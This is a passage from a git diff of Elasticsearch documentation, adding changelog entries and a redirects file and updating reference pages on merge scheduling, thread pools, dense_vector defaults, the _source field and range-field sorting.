+issues: [] diff --git a/docs/changelog/133424.yaml b/docs/changelog/133424.yaml new file mode 100644 index 0000000000000..6b89c4ec44173 --- /dev/null +++ b/docs/changelog/133424.yaml @@ -0,0 +1,5 @@ +pr: 133424 +summary: Ensuring only a single request executor object is created +area: Machine Learning +type: bug +issues: [] diff --git a/docs/changelog/133604.yaml b/docs/changelog/133604.yaml new file mode 100644 index 0000000000000..dd7be06544cce --- /dev/null +++ b/docs/changelog/133604.yaml @@ -0,0 +1,5 @@ +pr: 133604 +summary: Update `DefBootstrap` to handle Error from `ClassValue` +area: Infra/Scripting +type: bug +issues: [] diff --git a/docs/changelog/133611.yaml b/docs/changelog/133611.yaml new file mode 100644 index 0000000000000..9b86f75d9d276 --- /dev/null +++ b/docs/changelog/133611.yaml @@ -0,0 +1,6 @@ +pr: 133611 +summary: Allow trailing empty string field names in paths of flattened field +area: Mapping +type: bug +issues: + - 130139 diff --git a/docs/changelog/133671.yaml b/docs/changelog/133671.yaml new file mode 100644 index 0000000000000..ee16f659e9b27 --- /dev/null +++ b/docs/changelog/133671.yaml @@ -0,0 +1,5 @@ +pr: 133671 +summary: Remove `java.xml` from system modules +area: Infra/Core +type: bug +issues: [] diff --git a/docs/changelog/133680.yaml b/docs/changelog/133680.yaml new file mode 100644 index 0000000000000..c99beb5a1040a --- /dev/null +++ b/docs/changelog/133680.yaml @@ -0,0 +1,5 @@ +pr: 133680 +summary: Fix enrich caches outdated value after policy run +area: Ingest Node +type: bug +issues: [] diff --git a/docs/changelog/133681.yaml b/docs/changelog/133681.yaml new file mode 100644 index 0000000000000..6231eec2a5235 --- /dev/null +++ b/docs/changelog/133681.yaml @@ -0,0 +1,6 @@ +pr: 133681 +summary: Remove `DocumentSubsetBitsetCache` locking +area: Authorization +type: bug +issues: + - 132842 diff --git a/docs/changelog/133737.yaml b/docs/changelog/133737.yaml new file mode 100644 index 0000000000000..50fefa93f4871 --- /dev/null +++ b/docs/changelog/133737.yaml @@ -0,0 +1,6 @@ +pr: 133737 +summary: "KQL: Support boolean operators in field queries" +area: Search +type: bug +issues: + - 132366 diff --git a/docs/changelog/133752.yaml b/docs/changelog/133752.yaml new file mode 100644 index 0000000000000..784d6e2afa370 --- /dev/null +++ b/docs/changelog/133752.yaml @@ -0,0 +1,5 @@ +pr: 133752 +summary: Avoid stale enrich results after policy execution +area: Ingest Node +type: bug +issues: [] diff --git a/docs/changelog/133775.yaml b/docs/changelog/133775.yaml new file mode 100644 index 0000000000000..1bdecce846d9f --- /dev/null +++ b/docs/changelog/133775.yaml @@ -0,0 +1,5 @@ +pr: 133775 +summary: Remove Transfer-Encoding from HTTP request with no content +area: Network +type: bug +issues: [] diff --git a/docs/changelog/133793.yaml b/docs/changelog/133793.yaml new file mode 100644 index 0000000000000..6bf73ecaa060c --- /dev/null +++ b/docs/changelog/133793.yaml @@ -0,0 +1,6 @@ +pr: 133793 +summary: "[Sentinel One] Add `manage`, `create_index`, `read`, `index`, `write`, `delete`, permission for third party agent indices `kibana_system`" +area: Authorization +type: enhancement +issues: + - 133703 diff --git a/docs/changelog/133848.yaml b/docs/changelog/133848.yaml new file mode 100644 index 0000000000000..107513d21555b --- /dev/null +++ b/docs/changelog/133848.yaml @@ -0,0 +1,5 @@ +pr: 133848 +summary: Delay S3 repo warning if default region absent +area: Snapshot/Restore +type: bug +issues: [] diff --git a/docs/changelog/133919.yaml b/docs/changelog/133919.yaml new file mode 100644 index 0000000000000..34c3ecd3ebe57 --- /dev/null +++ b/docs/changelog/133919.yaml @@ -0,0 +1,5 @@ +pr: 133919 +summary: Fix double-counting of inference memory in the assignment rebalancer +area: Machine Learning +type: bug +issues: [] diff --git a/docs/docset.yml b/docs/docset.yml index 15bd674a5fb5e..dbaf687dbb832 100644 --- a/docs/docset.yml +++ b/docs/docset.yml @@ -13,6 +13,7 @@ cross_links: - docs-content - ecs - eland + - elasticsearch - elasticsearch-hadoop - elasticsearch-java - elasticsearch-js diff --git a/docs/internal/Versioning.md b/docs/internal/Versioning.md index b60f1ad9c2bc0..4a887f4caca86 100644 --- a/docs/internal/Versioning.md +++ b/docs/internal/Versioning.md @@ -109,12 +109,12 @@ This is an optional cleanup step that is never required for correctness. The transport version used between two nodes is determined by the initial handshake (see `TransportHandshaker`, where the two nodes swap their highest known transport version). The lowest transport version that is compatible with the current node -is determined by `TransportVersions.MINIMUM_COMPATIBLE`, +is determined by `TransportVersion.minimumCompatible()`, and the node is prevented from joining the cluster if it is below that version. This constant should be updated manually on a major release. The minimum version that can be used for CCS is determined by -`TransportVersions.MINIMUM_CCS_VERSION`, but this is not actively checked +`TransportVersion.minimumCCSVersion()`, but this is not actively checked before queries are performed. Only if a query cannot be serialized at that version is an action rejected. This constant is updated automatically as part of performing a release. diff --git a/docs/redirects.yml b/docs/redirects.yml new file mode 100644 index 0000000000000..d8e62f9a121e4 --- /dev/null +++ b/docs/redirects.yml @@ -0,0 +1,86 @@ +redirects: + # Related to https://github.com/elastic/elasticsearch/pull/130716/ + 'reference/query-languages/eql/eql-ex-threat-detection.md': 'docs-content://explore-analyze/query-filter/languages/example-detect-threats-with-eql.md' + + # https://github.com/elastic/elasticsearch/pull/131385 + 'reference/elasticsearch/rest-apis/retrievers.md': + to: 'reference/elasticsearch/rest-apis/retrievers.md' + anchors: {} # pass-through unlisted anchors in the `many` ruleset + many: + - to: 'reference/elasticsearch/rest-apis/retrievers/standard-retriever.md' + anchors: {'standard-retriever'} + - to: 'reference/elasticsearch/rest-apis/retrievers/knn-retriever.md' + anchors: {'knn-retriever'} + - to: 'reference/elasticsearch/rest-apis/retrievers/linear-retriever.md' + anchors: {'linear-retriever'} + - to: 'reference/elasticsearch/rest-apis/retrievers/rrf-retriever.md' + anchors: {'rrf-retriever'} + - to: 'reference/elasticsearch/rest-apis/retrievers/rescorer-retriever.md' + anchors: {'rescorer-retriever'} + - to: 'reference/elasticsearch/rest-apis/retrievers/text-similarity-reranker-retriever.md' + anchors: {'text-similarity-reranker-retriever'} + - to: 'reference/elasticsearch/rest-apis/retrievers/rule-retriever.md' + anchors: {'rule-retriever'} + - to: 'reference/elasticsearch/rest-apis/retrievers/pinned-retriever.md' + anchors: {'pinned-retriever'} + + # ESQL command redirects - split from aggregate pages to individual pages + 'reference/query-languages/esql/commands/source-commands.md': + to: 'reference/query-languages/esql/commands/source-commands.md' + anchors: {} # pass-through unlisted anchors in the `many` ruleset + many: + - to: 'reference/query-languages/esql/commands/from.md' + anchors: {'esql-from'} + - to: 'reference/query-languages/esql/commands/row.md' + anchors: {'esql-row'} + - to: 'reference/query-languages/esql/commands/show.md' + anchors: {'esql-show'} + + # Handle old anchor references to esql-commands.md + 'reference/query-languages/esql/esql-commands.md': + to: 'reference/query-languages/esql/esql-commands.md' + anchors: {} # pass-through unlisted anchors in the `many` ruleset + many: + - to: 'reference/query-languages/esql/commands/source-commands.md' + anchors: {'esql-source-commands'} + - to: 'reference/query-languages/esql/commands/processing-commands.md' + anchors: {'esql-processing-commands'} + + 'reference/query-languages/esql/commands/processing-commands.md': + to: 'reference/query-languages/esql/commands/processing-commands.md' + anchors: {} # pass-through unlisted anchors in the `many` ruleset + many: + - to: 'reference/query-languages/esql/commands/change-point.md' + anchors: {'esql-change_point'} + - to: 'reference/query-languages/esql/commands/completion.md' + anchors: {'esql-completion'} + - to: 'reference/query-languages/esql/commands/dissect.md' + anchors: {'esql-dissect'} + - to: 'reference/query-languages/esql/commands/drop.md' + anchors: {'esql-drop'} + - to: 'reference/query-languages/esql/commands/enrich.md' + anchors: {'esql-enrich'} + - to: 'reference/query-languages/esql/commands/eval.md' + anchors: {'esql-eval'} + - to: 'reference/query-languages/esql/commands/fork.md' + anchors: {'esql-fork'} + - to: 'reference/query-languages/esql/commands/grok.md' + anchors: {'esql-grok'} + - to: 'reference/query-languages/esql/commands/keep.md' + anchors: {'esql-keep'} + - to: 'reference/query-languages/esql/commands/limit.md' + anchors: {'esql-limit'} + - to: 'reference/query-languages/esql/commands/lookup-join.md' + anchors: {'esql-lookup-join'} + - to: 'reference/query-languages/esql/commands/mv_expand.md' + anchors: {'esql-mv_expand'} + - to: 'reference/query-languages/esql/commands/rename.md' + anchors: {'esql-rename'} + - to: 'reference/query-languages/esql/commands/sample.md' + anchors: {'esql-sample'} + - to: 'reference/query-languages/esql/commands/sort.md' + anchors: {'esql-sort'} + - to: 'reference/query-languages/esql/commands/stats-by.md' + anchors: {'esql-stats-by'} + - to: 'reference/query-languages/esql/commands/where.md' + anchors: {'esql-where'} diff --git a/docs/reference/elasticsearch-plugins/discovery-ec2-usage.md b/docs/reference/elasticsearch-plugins/discovery-ec2-usage.md index b5a69bb65f368..3c15b853d428d 100644 --- a/docs/reference/elasticsearch-plugins/discovery-ec2-usage.md +++ b/docs/reference/elasticsearch-plugins/discovery-ec2-usage.md @@ -1,4 +1,6 @@ --- +applies_to: + stack: ga mapped_pages: - https://www.elastic.co/guide/en/elasticsearch/plugins/current/discovery-ec2-usage.html --- @@ -45,6 +47,9 @@ The available settings for the EC2 discovery plugin are as follows. `discovery.ec2.endpoint` : The EC2 service endpoint to which to connect. See [https://docs.aws.amazon.com/general/latest/gr/rande.html#ec2_region](https://docs.aws.amazon.com/general/latest/gr/rande.html#ec2_region) to find the appropriate endpoint for the region. This setting defaults to `ec2.us-east-1.amazonaws.com` which is appropriate for clusters running in the `us-east-1` region. +`discovery.ec2.protocol` {applies_to}`stack: deprecated 9.1` +: The protocol to use to connect to the EC2 service endpoint, which may be either `http` or `https`. Defaults to `https`. This setting does not operate from version 9.1 and higher. + `discovery.ec2.proxy.host` : The address or host name of an HTTP proxy through which to connect to EC2. If not set, no proxy is used. diff --git a/docs/reference/elasticsearch/configuration-reference/thread-pool-settings.md b/docs/reference/elasticsearch/configuration-reference/thread-pool-settings.md index 8314ff41bdc59..2243e2decb448 100644 --- a/docs/reference/elasticsearch/configuration-reference/thread-pool-settings.md +++ b/docs/reference/elasticsearch/configuration-reference/thread-pool-settings.md @@ -59,8 +59,11 @@ $$$search-throttled$$$`search_throttled` `flush` : For [flush](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-indices-flush) and [translog](/reference/elasticsearch/index-settings/translog.md) `fsync` operations. Thread pool type is `scaling` with a keep-alive of `5m` and a default maximum size of `min(5, (`[`# of allocated processors`](#node.processors)`) / 2)`. +`merge` +: For [merge](https://www.elastic.co/guide/en/elasticsearch/reference/current/index-modules-merge.html) operations of all the shards on the node. Thread pool type is `scaling` with a keep-alive of `5m` and a default maximum size of [`# of allocated processors`](#node.processors). + `force_merge` -: For [force merge](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-indices-forcemerge) operations. Thread pool type is `fixed` with a size of `max(1, (`[`# of allocated processors`](#node.processors)`) / 8)` and an unbounded queue size. +: For waiting on blocking [force merge](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-indices-forcemerge) operations. Thread pool type is `fixed` with a size of `max(1, (`[`# of allocated processors`](#node.processors)`) / 8)` and an unbounded queue size. `management` : For cluster management. Thread pool type is `scaling` with a keep-alive of `5m` and a default maximum size of `5`. @@ -81,7 +84,7 @@ $$$search-throttled$$$`search_throttled` : For [watch executions](docs-content://explore-analyze/alerts-cases/watcher.md). Thread pool type is `fixed` with a default maximum size of `min(5 * (`[`# of allocated processors`](#node.processors)`), 50)` and queue_size of `1000`. $$$modules-threadpool-esql$$$`esql_worker` -: Executes [{{esql}}](docs-content://explore-analyze/query-filter/languages/esql.md) operations. Thread pool type is `fixed` with a size of `int((`[`# of allocated processors`](#node.processors) ` * 3) / 2) + 1`, and queue_size of `1000`. +: Executes [{{esql}}](/reference/query-languages/esql.md) operations. Thread pool type is `fixed` with a size of `int((`[`# of allocated processors`](#node.processors) ` * 3) / 2) + 1`, and queue_size of `1000`. Thread pool settings are [Static](docs-content://deploy-manage/stack-settings.md#static-cluster-setting) and can be changed by editing `elasticsearch.yml`. Changing a specific thread pool can be done by setting its type-specific parameters; for example, changing the number of threads in the `write` thread pool: diff --git a/docs/reference/elasticsearch/index-settings/merge.md b/docs/reference/elasticsearch/index-settings/merge.md index b5b6d10f7defe..c318fab3a5977 100644 --- a/docs/reference/elasticsearch/index-settings/merge.md +++ b/docs/reference/elasticsearch/index-settings/merge.md @@ -13,10 +13,32 @@ The merge process uses auto-throttling to balance the use of hardware resources ## Merge scheduling [merge-scheduling] -The merge scheduler (ConcurrentMergeScheduler) controls the execution of merge operations when they are needed. Merges run in separate threads, and when the maximum number of threads is reached, further merges will wait until a merge thread becomes available. +The merge scheduler controls the execution of merge operations when they are needed. +Merges run on the dedicated `merge` thread pool. +Smaller merges are prioritized over larger ones, across all shards on the node. +Merges are disk IO throttled so that bursts, while merging activity is otherwise low, are smoothed out in order to not impact indexing throughput. +There is no limit on the number of merges that can be enqueued for execution on the thread pool. +However, beyond a certain per-shard limit, after merging is completely disk IO un-throttled, indexing for the shard will itself be throttled until merging catches up. -The merge scheduler supports the following *dynamic* setting: +The available disk space is periodically monitored, such that no new merge tasks are scheduled for execution when the available disk space is low. +This is in order to prevent that the temporary disk space, which is required while merges are executed, completely fills up the disk space on the node. + +The merge scheduler supports the following *dynamic* settings: `index.merge.scheduler.max_thread_count` -: The maximum number of threads on a single shard that may be merging at once. Defaults to `Math.max(1, Math.min(4, <> / 2))` which works well for a good solid-state-disk (SSD). If your index is on spinning platter drives instead, decrease this to 1. +: The maximum number of threads on a **single** shard that may be merging at once. Defaults to `Math.max(1, Math.min(4, <> / 2))` which works well for a good solid-state-disk (SSD). If your index is on spinning platter drives instead, decrease this to 1. + +`indices.merge.disk.check_interval` +: The time interval for checking the available disk space. Defaults to `5s`. + +`indices.merge.disk.watermark.high` +: Controls the disk usage watermark, which defaults to `95%`, beyond which no merge tasks can start execution. +The disk usage tally includes the estimated temporary disk space still required by all the currently executing merge tasks. +Any merge task scheduled *before* the limit is reached continues execution, even if the limit is exceeded while executing +(merge tasks are not aborted). + +`indices.merge.disk.watermark.high.max_headroom` +: Controls the max headroom for the merge disk usage watermark, in case it is specified as percentage or ratio values. +Defaults to `100GB` when `indices.merge.disk.watermark.high` is not explicitly set. +This caps the amount of free disk space before merge scheduling is blocked. diff --git a/docs/reference/elasticsearch/index.md b/docs/reference/elasticsearch/index.md index a2060ee9c384c..18b308999471e 100644 --- a/docs/reference/elasticsearch/index.md +++ b/docs/reference/elasticsearch/index.md @@ -1,14 +1,65 @@ -# Elasticsearch and index management +# Elasticsearch -This section contains reference information for {{es}} and index management features. +{{es}} is a distributed search and analytics engine, scalable data store, and vector database built on Apache Lucene. It’s optimized for speed and relevance on production-scale workloads. Use Elasticsearch to search, index, store, and analyze data of all shapes and sizes in near real time. -To learn more about {{es}} features and how to get started, refer to the [{{es}}](docs-content://solutions/search.md) documentation. +## Quick links -For more details about query and scripting languages, check these sections: -* [Query languages](../query-languages/index.md) -* [Scripting languages](../scripting-languages/index.md) - -{{es}} also provides the following REST APIs: +:::{dropdown} Useful links -* [{{es}} API](https://www.elastic.co/docs/api/doc/elasticsearch) -* [{{es}} Serverless API](https://www.elastic.co/docs/api/doc/elasticsearch-serverless) \ No newline at end of file +- [REST API Reference](./rest-apis/index.md) +- [API Conventions](./rest-apis/api-conventions.md) +- [Settings Reference](https://www.elastic.co/guide/en/elasticsearch/reference/current/settings.html) +- [Breaking Changes](https://www.elastic.co/guide/en/elasticsearch/reference/current/breaking-changes.html) +- [Compatibility](./rest-apis/compatibility.md) +- [Glossary](https://www.elastic.co/guide/en/elasticsearch/reference/current/glossary.html) +- [Plugin Development](https://www.elastic.co/guide/en/elasticsearch/plugins/current/index.html) +- [Supported Platforms](https://www.elastic.co/support/matrix#matrix_jvm) +::: + +## Setup and architecture + +- [Set up Elasticsearch](docs-content://deploy-manage/deploy/self-managed/installing-elasticsearch.md) +- [Secure the Elastic Stack](docs-content://deploy-manage/security.md) +- [Upgrade Elasticsearch](docs-content://deploy-manage/upgrade/deployment-or-cluster.md) +- [Set up a cluster for high availability](docs-content://deploy-manage/tools.md) +- [Stack monitoring](docs-content://deploy-manage/monitor/stack-monitoring.md) +- [Troubleshooting](docs-content://troubleshoot/elasticsearch.md) +- [Optimizations](docs-content://deploy-manage/production-guidance/optimize-performance.md) + +## Working with data + +- [Adding data to Elasticsearch](docs-content://manage-data/ingest.md) +- [Connectors](https://www.elastic.co/docs/reference/search-connectors) +- [Web crawler](https://www.elastic.co/search-labs/blog/elastic-open-crawler-release) +- [Data streams](docs-content://manage-data/data-store/data-streams.md) +- [Ingest pipelines](docs-content://manage-data/ingest/transform-enrich/ingest-pipelines.md) +- [Mapping](docs-content://manage-data/data-store/mapping.md) +- [Data management](docs-content://manage-data/lifecycle.md) +- [Downsampling](docs-content://manage-data/lifecycle.md) +- [Snapshot and restore](docs-content://deploy-manage/tools/snapshot-and-restore.md) + +## Search and analytics + +{{es}} is the search and analytics engine that powers the {{stack}}. + +- [Get started](docs-content://get-started/index.md) +- [Learn how to search your data](docs-content://solutions/search/querying-for-search.md) +- Query data programmatically: use query languages to run advanced search, filtering, or analytics + - [Query DSL](docs-content://explore-analyze/query-filter/languages/querydsl.md): full JSON-based query language + - [ES|QL](/reference/query-languages/esql.md): fast, SQL-like language with piped syntax + - [EQL](docs-content://explore-analyze/query-filter/languages/eql.md): for event-based time series data, such as logs, metrics, and traces + - [SQL](docs-content://explore-analyze/query-filter/languages/sql.md): SQL-style queries on Elasticsearch data +- [Search applications](docs-content://solutions/search/search-applications.md) +- [Aggregations](docs-content://explore-analyze/query-filter/aggregations.md) +- [Geospatial analysis](docs-content://explore-analyze/geospatial-analysis.md) +- [Machine Learning](docs-content://explore-analyze/machine-learning.md) +- [Alerting](docs-content://explore-analyze/alerts-cases.md) + +## APIs and developer docs + +- [REST APIs](https://www.elastic.co/docs/reference/elasticsearch/rest-apis) +- [{{es}} Clients](https://www.elastic.co/docs/reference/elasticsearch-clients) +- [Painless](https://www.elastic.co/docs/reference/scripting-languages/painless/painless) +- [Plugins and integrations](https://www.elastic.co/docs/reference/elasticsearch/plugins) +- [Search Labs](https://www.elastic.co/search-labs) +- [Notebook examples](https://www.elastic.co/search-labs/tutorials/examples) diff --git a/docs/reference/elasticsearch/mapping-reference/dense-vector.md b/docs/reference/elasticsearch/mapping-reference/dense-vector.md index 7f3a701bde3f8..eb9b7be9738c7 100644 --- a/docs/reference/elasticsearch/mapping-reference/dense-vector.md +++ b/docs/reference/elasticsearch/mapping-reference/dense-vector.md @@ -55,7 +55,14 @@ In many cases, a brute-force kNN search is not efficient enough. For this reason Unmapped array fields of float elements with size between 128 and 4096 are dynamically mapped as `dense_vector` with a default similariy of `cosine`. You can override the default similarity by explicitly mapping the field as `dense_vector` with the desired similarity. -Indexing is enabled by default for dense vector fields and indexed as `bbq_hnsw` if dimensions are greater than or equal to 384, otherwise they are indexed as `int8_hnsw`. When indexing is enabled, you can define the vector similarity to use in kNN search: +Indexing is enabled by default for dense vector fields and indexed as `bbq_hnsw` if dimensions are greater than or equal to 384, otherwise they are indexed as `int8_hnsw`. {applies_to}`stack: ga 9.1` + +:::{note} +In {{stack}} 9.0, dense vector fields are always indexed as `int8_hnsw`. +::: + + +When indexing is enabled, you can define the vector similarity to use in kNN search: ```console PUT my-index-2 @@ -107,6 +114,10 @@ When using a quantized format, you may want to oversample and rescore the result To use a quantized index, you can set your index type to `int8_hnsw`, `int4_hnsw`, or `bbq_hnsw`. When indexing `float` vectors, the current default index type is `bbq_hnsw` for vectors with greater than or equal to 384 dimensions, otherwise it's `int8_hnsw`. +:::{note} +In {{stack}} 9.0, dense vector fields are always indexed as `int8_hnsw`. +::: + Quantized vectors can use [oversampling and rescoring](docs-content://solutions/search/vector/knn.md#dense-vector-knn-search-rescoring) to improve accuracy on approximate kNN search results. ::::{note} @@ -223,7 +234,7 @@ $$$dense-vector-similarity$$$ `l2_norm` : Computes similarity based on the L2 distance (also known as Euclidean distance) between the vectors. The document `_score` is computed as `1 / (1 + l2_norm(query, vector)^2)`. -For `bit` vectors, instead of using `l2_norm`, the `hamming` distance between the vectors is used. The `_score` transformation is `(numBits - hamming(a, b)) / numBits` + For `bit` vectors, instead of using `l2_norm`, the `hamming` distance between the vectors is used. The `_score` transformation is `(numBits - hamming(a, b)) / numBits` `dot_product` : Computes the dot product of two unit vectors. This option provides an optimized way to perform cosine similarity. The constraints and computed score are defined by `element_type`. @@ -255,9 +266,14 @@ $$$dense-vector-index-options$$$ `type` : (Required, string) The type of kNN algorithm to use. Can be either any of: * `hnsw` - This utilizes the [HNSW algorithm](https://arxiv.org/abs/1603.09320) for scalable approximate kNN search. This supports all `element_type` values. - * `int8_hnsw` - The default index type for float vectors with less than 384 dimensions. This utilizes the [HNSW algorithm](https://arxiv.org/abs/1603.09320) in addition to automatically scalar quantization for scalable approximate kNN search with `element_type` of `float`. This can reduce the memory footprint by 4x at the cost of some accuracy. See [Automatically quantize vectors for kNN search](#dense-vector-quantization). + * `int8_hnsw` - The default index type for some float vectors: + * {applies_to}`stack: ga 9.1` Default for float vectors with less than 384 dimensions. + * {applies_to}`stack: ga 9.0` Default for float all vectors. + This utilizes the [HNSW algorithm](https://arxiv.org/abs/1603.09320) in addition to automatically scalar quantization for scalable approximate kNN search with `element_type` of `float`. This can reduce the memory footprint by 4x at the cost of some accuracy. See [Automatically quantize vectors for kNN search](#dense-vector-quantization). * `int4_hnsw` - This utilizes the [HNSW algorithm](https://arxiv.org/abs/1603.09320) in addition to automatically scalar quantization for scalable approximate kNN search with `element_type` of `float`. This can reduce the memory footprint by 8x at the cost of some accuracy. See [Automatically quantize vectors for kNN search](#dense-vector-quantization). - * `bbq_hnsw` - The default index type for float vectors with greater than or equal to 384 dimensions. This utilizes the [HNSW algorithm](https://arxiv.org/abs/1603.09320) in addition to automatically binary quantization for scalable approximate kNN search with `element_type` of `float`. This can reduce the memory footprint by 32x at the cost of accuracy. See [Automatically quantize vectors for kNN search](#dense-vector-quantization). + * `bbq_hnsw` - This utilizes the [HNSW algorithm](https://arxiv.org/abs/1603.09320) in addition to automatically binary quantization for scalable approximate kNN search with `element_type` of `float`. This can reduce the memory footprint by 32x at the cost of accuracy. See [Automatically quantize vectors for kNN search](#dense-vector-quantization). + + {applies_to}`stack: ga 9.1` `bbq_hnsw` is the default index type for float vectors with greater than or equal to 384 dimensions. * `flat` - This utilizes a brute-force search algorithm for exact kNN search. This supports all `element_type` values. * `int8_flat` - This utilizes a brute-force search algorithm in addition to automatically scalar quantization. Only supports `element_type` of `float`. * `int4_flat` - This utilizes a brute-force search algorithm in addition to automatically half-byte scalar quantization. Only supports `element_type` of `float`. @@ -272,25 +288,24 @@ $$$dense-vector-index-options$$$ `confidence_interval` : (Optional, float) Only applicable to `int8_hnsw`, `int4_hnsw`, `int8_flat`, and `int4_flat` index types. The confidence interval to use when quantizing the vectors. Can be any value between and including `0.90` and `1.0` or exactly `0`. When the value is `0`, this indicates that dynamic quantiles should be calculated for optimized quantization. When between `0.90` and `1.0`, this value restricts the values used when calculating the quantization thresholds. For example, a value of `0.95` will only use the middle 95% of the values when calculating the quantization thresholds (e.g. the highest and lowest 2.5% of values will be ignored). Defaults to `1/(dims + 1)` for `int8` quantized vectors and `0` for `int4` for dynamic quantile calculation. - -`rescore_vector` +`rescore_vector` {applies_to}`stack: preview 9.0, ga 9.1` : (Optional, object) An optional section that configures automatic vector rescoring on knn queries for the given field. Only applicable to quantized index types. :::::{dropdown} Properties of rescore_vector `oversample` -: (required, float) The amount to oversample the search results by. This value should be greater than `1.0` and less than `10.0` or exactly `0` to indicate no oversampling & rescoring should occur. The higher the value, the more vectors will be gathered and rescored with the raw values per shard. +: (required, float) The amount to oversample the search results by. This value should be one of the following: + * Greater than `1.0` and less than `10.0` + * Exactly `0` to indicate no oversampling and rescoring should occur {applies_to}`stack: ga 9.1` + : The higher the value, the more vectors will be gathered and rescored with the raw values per shard. : In case a knn query specifies a `rescore_vector` parameter, the query `rescore_vector` parameter will be used instead. : See [oversampling and rescoring quantized vectors](docs-content://solutions/search/vector/knn.md#dense-vector-knn-search-rescoring) for details. ::::: :::: - - ## Synthetic `_source` [dense-vector-synthetic-source] `dense_vector` fields support [synthetic `_source`](/reference/elasticsearch/mapping-reference/mapping-source-field.md#synthetic-source) . - -## Indexing & Searching bit vectors [dense-vector-index-bit] +## Indexing and searching bit vectors [dense-vector-index-bit] When using `element_type: bit`, this will treat all vectors as bit vectors. Bit vectors utilize only a single bit per dimension and are internally encoded as bytes. This can be useful for very high-dimensional vectors or models. @@ -333,7 +348,6 @@ PUT my-bit-vectors 1. The number of dimensions that represents the number of bits - ```console POST /my-bit-vectors/_bulk?refresh {"index": {"_id" : "1"}} @@ -345,7 +359,6 @@ POST /my-bit-vectors/_bulk?refresh 1. 5 bytes representing the 40 bit dimensioned vector 2. A hexidecimal string representing the 40 bit dimensioned vector - Then, when searching, you can use the `knn` query to search for similar bit vectors: ```console @@ -391,14 +404,22 @@ POST /my-bit-vectors/_search?filter_path=hits.hits } ``` - ## Updatable field type [_updatable_field_type] To better accommodate scaling and performance needs, updating the `type` setting in `index_options` is possible with the [Update Mapping API](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-indices-put-mapping), according to the following graph (jumps allowed): +::::{tab-set} +:::{tab-item} {{stack}} 9.1+ ```txt flat --> int8_flat --> int4_flat --> bbq_flat --> hnsw --> int8_hnsw --> int4_hnsw --> bbq_hnsw ``` +::: +:::{tab-item} {{stack}} 9.0 +```txt +flat --> int8_flat --> int4_flat --> hnsw --> int8_hnsw --> int4_hnsw +``` +::: +:::: For updating all HNSW types (`hnsw`, `int8_hnsw`, `int4_hnsw`, `bbq_hnsw`) the number of connections `m` must either stay the same or increase. For the scalar quantized formats `int8_flat`, `int4_flat`, `int8_hnsw` and `int4_hnsw` the `confidence_interval` must always be consistent (once defined, it cannot change). @@ -447,5 +468,3 @@ Vectors indexed before this change will keep using the `flat` type (raw float32 In order to have all the vectors updated to the new type, either reindexing or force merging should be used. For debugging purposes, it’s possible to inspect how many segments (and docs) exist for each `type` with the [Index Segments API](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-indices-segments). - - diff --git a/docs/reference/elasticsearch/mapping-reference/mapping-source-field.md b/docs/reference/elasticsearch/mapping-reference/mapping-source-field.md index 931909d1cb371..2ee3c6b025141 100644 --- a/docs/reference/elasticsearch/mapping-reference/mapping-source-field.md +++ b/docs/reference/elasticsearch/mapping-reference/mapping-source-field.md @@ -14,7 +14,11 @@ If disk usage is important to you, then consider the following options: ## Synthetic `_source` [synthetic-source] -Though very handy to have around, the source field takes up a significant amount of space on disk. Instead of storing source documents on disk exactly as you send them, Elasticsearch can reconstruct source content on the fly upon retrieval. To enable this [subscription](https://www.elastic.co/subscriptions) feature, use the value `synthetic` for the index setting `index.mapping.source.mode`: +:::{note} +This feature requires a [subscription](https://www.elastic.co/subscriptions). +::: + +Though very handy to have around, the source field takes up a significant amount of space on disk. Instead of storing source documents on disk exactly as you send them, Elasticsearch can reconstruct source content on the fly upon retrieval. To enable this feature, use the value `synthetic` for the index setting `index.mapping.source.mode`: $$$enable-synthetic-source-example$$$ @@ -305,13 +309,12 @@ PUT my-index-000001 } ``` -::::{admonition} Think before disabling the _source field -:class: warning +::::{warning} -Users often disable the `_source` field without thinking about the consequences, and then live to regret it. If the `_source` field isn’t available then a number of features are not supported: +Do not disable the `_source` field, unless absolutely necessary. If you disable it, the following critical features will not be supported: * The [`update`](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-update), [`update_by_query`](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-update-by-query), and [`reindex`](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-reindex) APIs. -* In the {{kib}} [Discover](docs-content://explore-analyze/discover.md) application, field data will not be displayed. +* Display of field data in the {{kib}} [Discover](docs-content://explore-analyze/discover.md) application. * On the fly [highlighting](/reference/elasticsearch/rest-apis/highlighting.md). * The ability to reindex from one Elasticsearch index to another, either to change mappings or analysis, or to upgrade an index to a new major version. * The ability to debug queries or aggregations by viewing the original document used at index time. diff --git a/docs/reference/elasticsearch/mapping-reference/range.md b/docs/reference/elasticsearch/mapping-reference/range.md index 95a573222292b..b11edc7e4102c 100644 --- a/docs/reference/elasticsearch/mapping-reference/range.md +++ b/docs/reference/elasticsearch/mapping-reference/range.md @@ -215,6 +215,70 @@ The following parameters are accepted by range types: [`store`](/reference/elasticsearch/mapping-reference/mapping-store.md) : Whether the field value should be stored and retrievable separately from the [`_source`](/reference/elasticsearch/mapping-reference/mapping-source-field.md) field. Accepts `true` or `false` (default). +## Sorting + +Sorting is not supported for any of the `range` field types. Attempting to sort by a field of type range_field will result in a `400 Bad Request` response. +For example, executing a sort query on a field of type `integer_range`, +```console +PUT idx +{ + "mappings": { + "properties": { + "my_range": { + "type": "integer_range" + } + } + } +} + +POST idx/_search +{ + "sort": [ + { + "my_range": { + "order": "asc" + } + } + ] +} +``` +results in the following response: +```console-result +{ + "error": { + "root_cause": [ + { + "type": "illegal_argument_exception", + "reason": "Sorting by range field [my_range] is not supported" + } + ], + "type": "search_phase_execution_exception", + "reason": "all shards failed", + "phase": "query", + "grouped": true, + "failed_shards": [ + { + "shard": 0, + "index": "idx", + "node": "7pzVSCf5TuSNZYj-N7u3tw", + "reason": { + "type": "illegal_argument_exception", + "reason": "Sorting by range field [my_range] is not supported" + } + } + ], + "caused_by": { + "type": "illegal_argument_exception", + "reason": "Sorting by range field [my_range] is not supported", + "caused_by": { + "type": "illegal_argument_exception", + "reason": "Sorting by range field [my_range] is not supported" + } + } + }, + "status": 400 +} +``` ## Synthetic `_source` [range-synthetic-source] diff --git 